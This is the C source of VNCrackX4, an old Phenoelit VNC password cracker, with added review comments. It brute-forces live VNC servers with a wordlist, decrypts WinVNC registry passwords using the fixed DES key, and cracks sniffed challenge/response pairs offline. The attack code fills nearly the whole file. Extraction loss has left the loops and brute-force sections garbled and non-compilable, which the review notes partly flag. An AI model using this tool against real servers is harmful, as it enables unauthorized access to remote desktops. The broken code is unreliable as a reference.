/*
 * Project code: vncrack for windows (vnx4)
 *
 * FX
 * Phenoelit (http://www.phenoelit.de/)
 * (c) 2k
 *
 * VNC password recovery tool with three modes (see usage()):
 *  - online: connect to a VNC server and answer its 16-byte authentication
 *    challenge with every wordlist entry in turn (main());
 *  - Windows interactive: decrypt the 8-byte password blob WinVNC keeps in
 *    the registry, using VNC's fixed DES key (interactive());
 *  - offline: recover the password for a challenge/response pair captured
 *    by PHoss, first from a wordlist, then by brute force (cr_crack()).
 *
 * NOTE(review): this copy was extracted from HTML and every span that looked
 * like a tag (`<...>`) is missing: the system header names below, the option
 * parsing / socket setup / wordlist-loop header of main(), and several
 * stretches of cr_crack(). The gaps are marked inline and the surrounding
 * text is reproduced as found; reconstruct the lost parts from the original
 * source, not from this copy.
 */
#include   /* NOTE(review): header name lost in extraction */
#include   /* NOTE(review): header name lost in extraction */
#include   /* NOTE(review): header name lost in extraction */
#include   /* NOTE(review): header name lost in extraction */
#include   /* NOTE(review): header name lost in extraction
             * (the code visibly needs printf/fprintf, malloc/exit,
             * memset/strlen, time_t and the Winsock/Win32 API:
             * sockaddr_in, connect, closesocket, DWORD, GetTickCount) */
#include "d3des.h"     /* deskey()/des(), DE1 */
#include "vncauth.h"   /* vncEncryptBytes() */

/* VNC's well-known fixed DES key; defined in the vncauth sources, only declared here */
extern unsigned char fixedkey[8];

#define SPLASH "VNCrackX4 - by Phenoelit (http://www.phenoelit.de/)\n"   /* not referenced in the visible part of the file */

int verbose=0,lbf=0;   /* verbose: -v count (0..2 are distinguished); lbf: not referenced in the visible code */
/* -c / -r arguments: challenge and response as 32 hex characters each, consumed by
 * cr_crack(). The option parser that sets them is in the lost section of main(). */
char *schallange=NULL, *sresponse=NULL;

void interactive(void);
void cr_crack(char *wordlist);

/*
 * malloc() wrapper: returns a zero-filled block of `size` bytes, or aborts
 * the process with exit(-1) when allocation fails, so callers never see NULL.
 * The zero fill is what later keeps "%s" prints of these buffers terminated.
 *
 * NOTE(review): "%d" does not match a size_t argument (undefined behaviour
 * per C, harmless only where int and size_t are the same width); use "%lu"
 * with a cast, or "%zu" on a C99 CRT.
 */
void *sec_malloc(size_t size)
{
	void *p;
	if ((p=malloc(size))==NULL) {
		fprintf(stderr,"malloc() failed for %d bytes\n",size);
		exit (-1);
	}
	memset(p,0,size);
	return p;
}

/* Prints the command-line help to stdout and exits with status -1.
 * (The "-W" and "-c"/"-r" argument placeholders were lost in extraction.) */
void usage(void)
{
	printf("VNCrackX4\n"
	       "by Phenoelit (http://www.phenoelit.de/)\n\n"\
	       "Usage:\n"
	       "Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n"
	       "Windows interactive mode: ./vncrack -W \n"
	       "\tenter hex key one byte per line - find it in\n"
	       "\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n"
	       "\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n"
	       "Options for online mode:\n"
	       "-v\tverbose (repeat -v for more)\n"
	       "-p P\tconnect to port P instead of 5900\n"
	       "Options for PHoss intercepted challages:\n"
	       "-c \tchallange from PHoss output\n"
	       "-r \tresponse from PHoss output\n"
	       );
	exit(-1);
}

/*
 * Busy-waits for `ms` milliseconds on GetTickCount().
 *
 * NOTE(review): spins at 100% CPU instead of yielding, and t1+ms wraps when
 * GetTickCount() is near its 32-bit rollover, in which case the loop exits
 * immediately. Win32 provides Sleep(); why a custom loop was used is not
 * recorded.
 */
void sleep(DWORD ms)
{
	DWORD t1;
	t1=GetTickCount();
	while (GetTickCount()<(t1+ms));
}

/*
 * Online mode: tries every wordlist entry as the password of the target VNC
 * server ("VNC authentication", security type 2).
 *
 * Per candidate: connect, read the server's version string and echo it back,
 * read the 4-byte security type, read the 16-byte challenge, DES-encrypt it
 * with the candidate (vncEncryptBytes) and send it, then read the 4-byte
 * result: 0 = accepted, 1 = rejected, 2 = too many attempts (the server
 * throttles; this code waits 10 s and goes on).
 *
 * Exits 0 after printing the password on success; every error path exit(-1)s.
 *
 * NOTE(review): the option parser, host lookup, socket() creation, fopen()
 * of the wordlist and the per-line loop header were lost in extraction (see
 * the marker below); brace balance in this copy reflects that.
 */
int main(int argc, char **argv)
{
	int sfd; /* socket */
	unsigned long dest_ip;
	struct sockaddr_in dest_addr;
	char *rbuf;                    /* server version string, 100 bytes from sec_malloc() */
	unsigned char atype[4];        /* security type, later the auth result; only byte 3 (low byte) is inspected */
	unsigned char challange[16];   /* server challenge, encrypted in place before sending */
	char *vnchost=NULL;
	u_short vncport=5900;          /* default RFB port; -p overrides (parser not visible) */
	int i,ani=0;
	char *wordlist=NULL;
	FILE *fd;
	char *tryword;                 /* current wordlist line; the memset() below assumes it is 256 bytes */
	char servertext[255];          /* close reason sent by the server (verbose only) */
	char *sthelp;
	int conwait=90;                /* not referenced in the visible code */

	/* check the command line options */
	/*
	 * NOTE(review): everything from the option-parsing loop up to "8)" was
	 * lost in extraction. The fragment that survives is the tail of a length
	 * check that truncates the candidate to 8 characters -- VNC only ever
	 * uses the first 8 bytes of the password as the DES key.
	 */
	for (i=1;i8) tryword[8]='\0';
	/* strip the trailing newline left by the line reader.
	 * NOTE(review): for an empty line strlen() is 0 and this writes at
	 * index -1; for a last line without newline it chops a real character. */
	tryword[strlen(tryword)-1]='\0';
	if (verbose) {
		printf("\ntrying '%s' ...",tryword);
		fflush(stdout);
	}
	/* NOTE(review): sfd is shutdown()/closesocket()'d at the bottom of this
	 * loop; unless the lost section calls socket() again on every pass,
	 * this connect() reuses a closed descriptor. A single transient connect
	 * failure also aborts the whole wordlist run. */
	if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))!=0) {
		fprintf(stderr,"Connect failed.\n");
		exit(-1);
	}
	/* connunication starts with server->client version packet */
	/* NOTE(review): rbuf is allocated on every iteration and never freed.
	 * recv() may fill all 100 bytes, leaving no terminator for the strlen()
	 * and "%s" below (reads past the allocation) -- cap the read at 99.
	 * No receive timeout is set anywhere in the visible code, so a server
	 * that stops talking blocks the tool forever. */
	rbuf=sec_malloc(100);
	if (recv(sfd,rbuf,100,0)<0) {
		fprintf(stderr,"recv()");
		exit(-1);
	}
	if (verbose>1) printf("\nServer Protocol version: %s",rbuf);
	/* bounce this message back - so the server will continue */
	if (send(sfd,rbuf,strlen(rbuf),0)<0) {
		fprintf(stderr,"send()");
		exit(-1);
	}
	/* 4-byte security type. Only a negative return is treated as an error;
	 * a short read leaves part of atype uninitialised. */
	if (recv(sfd,atype,sizeof(atype),0)<0) {
		fprintf(stderr,"recv()");
		exit(-1);
	}
	if (verbose>1) {
		printf("Authentication type: ");
		for (i=0;i<4;i++) {
			printf("%x ",atype[i]);
		}
		printf("\n");
	}
	switch (atype[3]) {
	case 0:
		fprintf(stderr,"Server told me: connection close\n");
		if (verbose) {
			// try to retrieve the reason
			/* the first 4 bytes are skipped (presumably a length prefix)
			 * and the rest printed as text.
			 * NOTE(review): a full 255-byte read leaves servertext without
			 * a terminator for the "%s" below; read sizeof(servertext)-1. */
			memset(servertext,0,sizeof(servertext));
			if (recv(sfd,servertext,sizeof(servertext),0)<0) {
				fprintf(stderr,"recv() in verbose");
				exit(-1);
			} else {
				sthelp=servertext;
				sthelp+=4;
				fprintf(stderr,"Server says: %s\n",sthelp);
			}
		}
		exit(-1);
		break; /* not reached */
	case 1:
		printf(
		"\n>>>>>>>>>>>>>>>\n"
		"Server does not require authentication!\n"
		">>>>>>>>>>>>>>>\n");
		exit(-1);
		break; /* not reached */
	case 2:
		if (verbose>1) printf(
		"Authentication type 'VNC authentication' - fine\n");
		break;
	default:
		fprintf(stderr,"Unknown authentication requested by server\n");
		exit(-1);
	}
	/* 16-byte challenge; again only recv() < 0 is checked */
	if (recv(sfd,challange,sizeof(challange),0)<0) {
		fprintf(stderr,"recv()");
		exit(-1);
	}
	if (verbose>1) {
		printf("challange: ");
		for (i=0;i<16;i++) {
			printf("%x ",challange[i]);
		}
		printf("\n");
	}
	/* encrypt challange with password and send this fuck to the server */
	/* vncEncryptBytes() (vncauth.h) DES-encrypts the challenge in place,
	 * keyed with the candidate password */
	vncEncryptBytes(challange,tryword);
	if (send(sfd,challange,sizeof(challange),0)<0) {
		fprintf(stderr,"auth send()");
		exit(-1);
	}
	/* NOTE(review): atype[3] is cleared before the read and 0 means
	 * "accepted", so an empty or short recv() (e.g. the server closing the
	 * connection) is reported as a found password. Require the recv()
	 * return value to equal sizeof(atype) before trusting atype[3]. */
	atype[3]=0;
	if (recv(sfd,atype,sizeof(atype),0)<0) {
		fprintf(stderr,"auth recv()");
		exit(-1);
	}
	switch (atype[3]) {
	case 0:
		printf(
		"\n>>>>>>>>>>>>>>>\n"
		"Password: %s\n"
		">>>>>>>>>>>>>>>\n",tryword);
		free(tryword);
		exit(0);
		break; /* not reached */
	case 1: /* 'normal' failed */
		if (verbose) printf("failed\n");
		break;
	case 2: /* too many */
		/* server-side throttling kicked in; back off with the local busy-wait */
		printf("Server is angry, waiting for calm down...\n");
		sleep(10000);
		break;
	default:
		fprintf(stderr,"Unknown response\n");
		exit(-1);
	}
	shutdown(sfd,2);
	closesocket(sfd);
	memset(tryword,0,256);   /* scrub the candidate before the next line is read in */
	}
	free(tryword);
	fclose(fd);
	return 0;
}

/*
 * Windows interactive mode: reads the 8 bytes of the WinVNC "Password"
 * registry value from stdin (one hex byte per line), decrypts them with the
 * fixed VNC DES key and prints the plaintext. The registry value is only
 * obfuscated with a publicly known key, so anyone who can read it gets the
 * password.
 *
 * NOTE(review): scanf("%x") stores an unsigned int, but &c points at a
 * single char, so every read overwrites the bytes next to c on the stack
 * (undefined behaviour); read into an unsigned int and assign pass[i] from
 * it. The scanf() return value is also unchecked, so malformed input leaves
 * c uninitialised. The 9th byte from sec_malloc() stays zero, which is what
 * keeps the final "%s" bounded.
 */
void interactive(void)
{
	unsigned char *pass;
	int i;
	char c;
	pass=(char *)sec_malloc(9);
	for (i=0;i<8;i++) {
		scanf("%x",&c);
		pass[i]=c;
	}
	printf("Entered HEX String: ");
	for (i=0;i<8;i++) {
		printf("%x ",pass[i]);
	}
	printf("\n");
	deskey(fixedkey,DE1);   /* key schedule for the fixed key; DE1 selects decryption in d3des */
	des(pass,pass);         /* one DES block, decrypted in place */
	printf("VNC Password: %s\n",pass);
	exit(0);
}

/*
 * Offline mode: recovers the password behind a sniffed challenge/response
 * pair (PHoss output, passed as -c/-r, 32 hex characters each). Candidates
 * from the wordlist are tried first, then passwords of growing length are
 * brute-forced over cset1, one nested loop per depth.
 *
 * NOTE(review): this function continues past the end of this listing, and
 * several stretches were lost in extraction: the hex decoder for
 * schallange/sresponse, the wordlist loop header, and the loop bounds plus
 * compare of every brute-force depth. The text is reproduced as found.
 */
void cr_crack(char *wordlist)
{
	int i,j;
#define CRL 16
	char chl[CRL+1];    /* decoded challenge bytes (decoder lost; presumably from schallange) */
	char rsp[CRL+1];    /* decoded expected response bytes (presumably from sresponse) */
	char tchl[CRL+1];   /* scratch copy of the challenge, presumably encrypted with each candidate */
	char ts[3];         /* two hex digits plus NUL, presumably used by the lost decoder */
	FILE *fd;
	char *tryword;      /* current wordlist line; the memset() below assumes 256 bytes */
	char bft[9];        /* brute-force candidate, NUL-terminated at the current depth */
	char cset1[] =
		"abcdefghijklmnopqrstuvwxyz"
		"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
		"1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>?\0";
#define cset1_len (92)   /* characters in cset1: 26 + 26 + 40 */
	int cnt[8];          /* per-position index into cset1 */
	time_t t1,t2;        /* NOTE(review): t1 receives a DWORD tick count below, not a time_t */

	if (!wordlist) {
		fprintf(stderr,"Supply wordlist file !");
		exit(-1);
	}
	if ((!schallange)||(!sresponse)) {
		usage();
	}
	/* both strings must be exactly 16 bytes in hex */
	if ( (strlen(schallange)!=16*2) ||(strlen(sresponse)!=16*2) ) {
		fprintf(stderr, "challange and response have to be 32 characters each\n");
		exit (-1);
	}
	memset(&chl,0,CRL+1);
	memset(&tchl,0,CRL+1);
	memset(&rsp,0,CRL+1);
	memset(&ts,0,3);
	j=0;
	/* NOTE(review): lost text follows -- the hex decode loop, the verbose
	 * dump, the wordlist open and the per-line loop header. */
	for (i=0;i1) {
	for (i=0;i>>>>>>>>>>>>>>\n"
		"Password: %s\n"
		">>>>>>>>>>>>>>>\n",tryword);
		free(tryword);
		exit(0);
	} else {
		if (verbose) printf("%s failed\n",tryword);
	}
	memset(tryword,0,256);
	}
	fclose(fd);
	free(tryword);
	printf(
	"-----------------------------------\n"
	"Wordlist failed - going brute force\n"
	"-----------------------------------\n"
	);
	t1=GetTickCount();
	bft[8]='\0';
	bft[1]='\0';
	/* NOTE(review): the loop bound and the compare of every depth below
	 * were lost in extraction; only the success print survives. */
	printf("\tdepth I\n");
	for (cnt[0]=0;cnt[0]>>>>>>>>>>>>>>\n"
	"Password: %s\n"
	">>>>>>>>>>>>>>>\n", bft);
	exit (0);
	}
	} // for 0
	bft[2]='\0';
	printf("\tdepth II\n");
	for (cnt[1]=0;cnt[1]>>>>>>>>>>>>>>\n"
	"Password: %s\n"
	">>>>>>>>>>>>>>>\n", bft);
	exit (0);
	}
	} // for 0
	} // for 1
	/************/
	bft[3]='\0';
	printf("\tdepth III\n");
	for (cnt[2]=0;cnt[2]>>>>>>>>>>>>>>\n"
	"Password: %s\n"
	">>>>>>>>>>>>>>>\n", bft);
	exit (0);
	}
	} // for 0
	} // for 1
	} //2
/************/ bft[4]='\0'; printf("\tdepth IV\n"); for (cnt[3]=0;cnt[3]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 /************/ bft[5]='\0'; printf("\tdepth V\n"); for (cnt[4]=0;cnt[4]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 /************/ bft[6]='\0'; printf("\tdepth VI\n"); for (cnt[5]=0;cnt[5]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 } //